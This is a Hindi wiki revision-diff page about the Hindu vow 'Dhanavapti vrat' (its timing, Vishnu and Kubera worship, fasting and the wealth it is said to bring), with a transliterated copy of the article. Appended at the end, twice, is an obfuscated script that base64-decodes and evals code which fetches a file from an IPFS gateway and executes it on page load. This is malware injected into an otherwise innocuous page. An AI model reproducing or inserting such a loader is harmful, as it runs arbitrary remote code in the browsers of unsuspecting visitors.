Difference between revisions of "धनावाप्ति व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (धनावाप्तिव्रत का नाम बदलकर धनावाप्ति व्रत कर दिया गया है)
m (Text replace - ")</ref" to "</ref")
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[श्रावण पूर्णिमा]] के उपरान्त प्रथम तिथि पर आरम्भ होता है।
 
*[[श्रावण पूर्णिमा]] के उपरान्त प्रथम तिथि पर आरम्भ होता है।
 
*यह व्रत एक मास तक चलता है।  
 
*यह व्रत एक मास तक चलता है।  
 
*नील कमलों, घी, नैवेद्य के साथ विष्णु एवं संकर्षण की पूजा की जाती है।
 
*नील कमलों, घी, नैवेद्य के साथ विष्णु एवं संकर्षण की पूजा की जाती है।
 
*[[भाद्रपद पूर्णिमा]] के पूर्व तीन दिनों तक उपवास किया जाता है।
 
*[[भाद्रपद पूर्णिमा]] के पूर्व तीन दिनों तक उपवास किया जाता है।
*इस व्रत के अन्त में गौ दान भी किया जाता है।<ref>हेमाद्रि (व्रतखण्ड 2, 759)</ref>  
+
*इस व्रत के अन्त में गौ दान भी किया जाता है।<ref>हेमाद्रि (व्रतखण्ड 2, 759</ref>  
*एक वर्ष तक वैश्रवण (कुबेर) की पूजा करते है।
+
*एक वर्ष तक वैश्रवण (कुबेर) की पूजा करते हैं।
*इस व्रत से बहुत धन की प्राप्ति होती है।<ref>हेमाद्रि (व्रतखण्ड 155, विष्णुधर्मोत्तरपुराण से उद्धरण)</ref>  
+
*इस व्रत से बहुत धन की प्राप्ति होती है।<ref>हेमाद्रि (व्रतखण्ड 155, विष्णुधर्मोत्तरपुराण से उद्धरण</ref>  
 
*अन्य मत के अनुसार[[चैत्र]] [[शुक्ल पक्ष]] [[प्रथमा]] से आरम्भ होता है।
 
*अन्य मत के अनुसार[[चैत्र]] [[शुक्ल पक्ष]] [[प्रथमा]] से आरम्भ होता है।
 
*विष्णु, पृथ्वी, आकाश एवं ब्रह्मा की मूर्तियों की क्रम से प्रथमा से चतुर्थी तक एक वर्ष तक पूजा की जाती है।
 
*विष्णु, पृथ्वी, आकाश एवं ब्रह्मा की मूर्तियों की क्रम से प्रथमा से चतुर्थी तक एक वर्ष तक पूजा की जाती है।
*इस व्रत से सम्पत्ति, सौन्दर्य एवं सुख की प्राप्ति होती है।<ref>हेमाद्रि (व्रत0 2, 501-502)</ref>  
+
*इस व्रत से सम्पत्ति, सौन्दर्य एवं सुख की प्राप्ति होती है।<ref>हेमाद्रि (व्रत0 2, 501-502</ref>  
 
*यह चतुमूर्तिव्रत है।
 
*यह चतुमूर्तिव्रत है।
 
+
{{प्रचार}}
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:50, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • shravan poornima ke uparant pratham tithi par arambh hota hai.
  • yah vrat ek mas tak chalata hai.
  • nil kamaloan, ghi, naivedy ke sath vishnu evan sankarshan ki pooja ki jati hai.
  • bhadrapad poornima ke poorv tin dinoan tak upavas kiya jata hai.
  • is vrat ke ant mean gau dan bhi kiya jata hai.[1]
  • ek varsh tak vaishravan (kuber) ki pooja karate haian.
  • is vrat se bahut dhan ki prapti hoti hai.[2]
  • any mat ke anusarchaitr shukl paksh prathama se arambh hota hai.
  • vishnu, prithvi, akash evan brahma ki moortiyoan ki kram se prathama se chaturthi tak ek varsh tak pooja ki jati hai.
  • is vrat se sampatti, saundary evan sukh ki prapti hoti hai.[3]
  • yah chatumoortivrat hai.


tika tippani aur sandarbh

  1. hemadri (vratakhand 2, 759
  2. hemadri (vratakhand 155, vishnudharmottarapuran se uddharan
  3. hemadri (vrat0 2, 501-502

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>